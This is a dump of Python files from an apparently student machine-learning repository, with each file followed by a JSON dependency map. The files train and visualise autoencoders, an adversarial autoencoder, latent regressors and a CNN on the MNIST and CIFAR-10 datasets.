max = np.max(latent_spaces)
min = np.min(latent_spaces)
# Split training set into classes
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]
# Create list of all latent arrays
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
latent_horse, latent_ship, latent_truck)
plt.figure()
for i in range(latent_dim):
ax = plt.subplot(8, 8, i + 1)
plt.hist(latent_spaces[:,i], 100, facecolor='green', alpha=0.5)
plt.xlim(min, max)
plt.ylim(0, 2000)
if i != 56:
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig('Images/cifar10_bigan_encoder_latent_distribution_training_set')
# Generate distribution of each latent dimension for each individual class
for i, set in enumerate(latent_sets):
plt.figure()
for j in range(latent_dim):
ax = plt.subplot(8, 8, j + 1)
plt.hist(set[:,j], 100, facecolor='green', alpha=0.5)
plt.xlim(min, max)
plt.ylim(0, 200)
if j != 56:
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig('Images/cifar10_bigan_encoder_latent_distribution_class_%d' % i) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,512 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_interpol.py | import numpy as np
from random import randint
from keras.datasets import mnist
from mnist_conv_ae_models import *
import matplotlib.pyplot as plt
import scipy.stats
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
num_steps = 7
# Shows linear inteprolation in image space vs latent space
print("Generating interpolations...")
# Create micro batch
X = np.array([x_test[randint(0,x_test.shape[0])], x_test[randint(0,x_test.shape[0])]])
# Generate encoder and decoder models
encoder = encoder_model()
encoder.load_weights('encoder.h5')
decoder = decoder_model()
decoder.load_weights('decoder.h5')
# Compute latent space projection
latentX = encoder.predict(X)
latentStart, latentEnd = latentX
# Get original image for comparison
startImage, endImage = X
vectors = []
normalImages = []
# Linear interpolation
alphaValues = np.linspace(0, 1, num_steps)
for alpha in alphaValues:
# Latent space interpolation
vector = latentStart * (1 - alpha) + latentEnd * alpha
vectors.append(vector)
# Image space interpolation
blendImage = (1 - alpha) * startImage + alpha * endImage
normalImages.append(blendImage)
# Decode latent space vectors
vectors = np.array(vectors)
reconstructions = decoder.predict(vectors)
reconstructions *= 255
# Convert pixel-space images for use in plotting
normalImages = np.array(normalImages)
# Plot interpolations
plt.figure(figsize=(20, 4))
n = len(reconstructions)
for i in range(n):
# Display interpolation in pixel-space
ax = plt.subplot(2, n, i + 1)
plt.imshow(normalImages[i].reshape(28,28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Display interpolation in latent space
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(reconstructions[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,513 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/cifar10_cnn.py | '''Train a simple deep CNN on the CIFAR10 small images dataset.
It gets to 75% validation accuracy in 25 epochs, and 79% after 50 epochs.
(it's still underfitting at that point, though).
'''
from __future__ import print_function
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.callbacks import EarlyStopping, ModelCheckpoint
import matplotlib.pyplot as plt
import numpy as np
from sklearn.model_selection import train_test_split
# Set random seed for reproducibility
np.random.seed(12345)
# Define settings
num_classes = 10
num_examples = 5000
num_initializations = 5
# Function to plot training loss curves
def plot_train_loss(history):
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()
# The data, split between train and test sets:
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train[:num_examples]
y_train = y_train[:num_examples]
# Split training data into training and validation set
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.1, random_state=12345)
x_train = x_train.astype(np.float32) / 255.
x_val = x_val.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_val = keras.utils.to_categorical(y_val, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# Define model
def cnn_model():
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same',
input_shape=x_train.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
return model
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
#opt = keras.optimizers.Adadelta()
# Set training hyper-parameters
epochs = 200
batch_size = 256
patience = 10
no_aug = np.zeros(num_initializations)
post_aug = np.zeros(num_initializations)
for initialization in range(num_initializations):
# Instantiate CNN
model = cnn_model()
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# =====================================
# No augmentation
# =====================================
print('Not using data augmentation.')
# Specify callbacks
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0),
ModelCheckpoint('cifar10_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')]
no_aug_history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_val, y_val),
callbacks = callbacks,
shuffle=True)
model.load_weights('cifar10_cnn.h5')
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
no_aug[initialization] = scores[1]
# =====================================
# Post augmentation
# =====================================
print('Using post augmentation.')
# Specify callbacks
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0),
ModelCheckpoint('cifar10_post_augmented_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')]
# Specify augmentation details
datagen = ImageDataGenerator(rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# Fit the model on the batches generated by datagen.flow().
post_aug_history = model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),
epochs=epochs,
steps_per_epoch=x_train.shape[0] // batch_size,
validation_data=datagen.flow(x_val, y_val, batch_size=batch_size),
validation_steps=x_val.shape[0] // batch_size,
callbacks=callbacks)
model.load_weights('cifar10_post_augmented_cnn.h5')
# Score trained model
scores = model.evaluate(x_test, y_test, verbose=1)
post_aug[initialization] = scores[1]
# =====================================
# Show results
# =====================================
# Print accuracy results
print('\n\nNo augmentation: %f\nPost augmentation: %f' % (np.mean(no_aug), np.mean(post_aug)))
# Plot loss curves
plot_train_loss(no_aug_history)
plot_train_loss(post_aug_history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,514 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_aae_train.py | from __future__ import print_function, division
from mnist_mlp_models import encoder_model, generator_model, aae_discriminator_model
from common_models.common_models import aae_model
from functions.visualization_funcs import save_reconstructions, plot_gan_batch_loss, plot_gan_epoch_loss, save_imgs,\
plot_discriminator_acc
from functions.data_funcs import get_mnist
from functions.auxiliary_funcs import save_models
from keras.optimizers import Adam
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_aae'
model_path = 'Models/mnist_aae'
# =====================================
# Load dataset
# =====================================
# Load MNIST data in range [0,1]
(X_train, _), (X_test, y_test) = get_mnist()
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = encoder_model()
generator = generator_model()
discriminator = aae_discriminator_model()
# Specify optimizer
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile discriminator
discriminator.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
# Compile AAE
discriminator.trainable = False
aae = aae_model(encoder, generator, discriminator, img_shape)
aae.compile(loss=['binary_crossentropy', 'binary_crossentropy'],
loss_weights=[np.prod(img_shape), 1],
optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
epoch_save_interval = 5
# Compute number of batches in one epoch
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
latent_fake = encoder.predict(imgs)
latent_real = np.random.normal(size=(batch_size, latent_dim))
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
d_loss_real = discriminator.train_on_batch(latent_real, valid)
d_loss_fake = discriminator.train_on_batch(latent_fake, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ---------------------
# Train Generator
# ---------------------
# Train the generator
g_loss = aae.train_on_batch(imgs, [imgs, valid])
# Record generator loss
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
g_epoch_loss_sum += g_loss[0]
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch + 1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss[0]))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
# Generate random sample of latent vectors and save generated images
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=False)
# Save encoder weights
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,515 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_lr_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_mnist
from functions.visualization_funcs import save_reconstructions, plot_train_loss
from mnist_mlp_models import encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
from keras.optimizers import Adam
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_lr'
model_path = 'Models/mnist_lr'
# =====================================
# Load dataset
# =====================================
# Load MNIST data in range [-1,1]
(X_train, _), (X_test, y_test) = get_mnist(gan=True)
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================
# Instanstiate models
encoder = encoder_model()
generator = generator_model(gan=True)
latent_regressor = latent_reconstructor_model(generator, encoder)
# Compile latent regressor
generator.load_weights('Models/mnist_gan_generator.h5')
generator.trainable = False
latent_regressor.compile(optimizer='SGD', loss='mse')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5
# Specify training stopping criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = latent_regressor.fit(z_train, z_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(z_test, z_test),
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the saved best autoencoder
decoder = generator_model()
encoder = encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualization
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Plot training curves
plot_train_loss(image_path, history)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", 